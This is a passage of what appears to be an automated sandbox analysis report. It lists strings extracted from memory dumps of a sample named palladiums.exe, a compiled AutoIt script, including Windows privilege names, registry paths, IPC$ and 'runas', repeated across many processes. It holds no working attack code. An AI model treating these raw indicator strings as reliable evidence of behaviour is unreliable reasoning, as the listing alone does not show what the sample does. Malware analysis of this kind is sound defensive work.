memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_f540bbe9-4
Source: palladiums.exe, 0000000C.00000002.2178106857.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_fd355d4f-0
Source: palladiums.exe, 0000000C.00000002.2178106857.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b96ab8a1-8
Source: palladiums.exe, 0000000E.00000000.2177422059.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_18e5bf16-a
Source: palladiums.exe, 0000000E.00000000.2177422059.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_90805678-4
Source: palladiums.exe, 0000000F.00000000.2190138381.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3e02dd09-0
Source: palladiums.exe, 0000000F.00000000.2190138381.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4b108490-f
Source: palladiums.exe, 00000010.00000002.2209051242.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c97d2f46-8
Source: palladiums.exe, 00000010.00000002.2209051242.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_8f56ce2c-9
Source: palladiums.exe, 00000011.00000000.2208121005.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9d84fdbe-d
Source: palladiums.exe, 00000011.00000000.2208121005.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_2997bd44-f
Source: palladiums.exe, 00000012.00000002.2226806136.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_83812dfa-7
Source: palladiums.exe, 00000012.00000002.2226806136.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_33141854-6
Source: palladiums.exe, 00000013.00000000.2226181702.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_38f93c4f-b
Source: palladiums.exe, 00000013.00000000.2226181702.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_62ac64be-a
Source: palladiums.exe, 00000014.00000002.2244821779.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_028ed9f6-d
Source: palladiums.exe, 00000014.00000002.2244821779.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_235475ec-2
Source: palladiums.exe, 00000015.00000000.2243747181.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_eb74d8bc-7
Source: palladiums.exe, 00000015.00000000.2243747181.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c0c69f51-8
Source: palladiums.exe, 00000016.00000000.2253734948.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1b97308a-3
Source: palladiums.exe, 00000016.00000000.2253734948.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_805c58d5-a
Source: palladiums.exe, 00000017.00000000.2262801517.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_03a0520d-5
Source: palladiums.exe, 00000017.00000000.2262801517.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_21826b79-4
Source: palladiums.exe, 00000018.00000002.2280329404.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_33bdf700-9
Source: palladiums.exe, 00000018.00000002.2280329404.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1efd06ce-c
Source: palladiums.exe, 00000019.00000000.2279710337.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b00d25ad-e
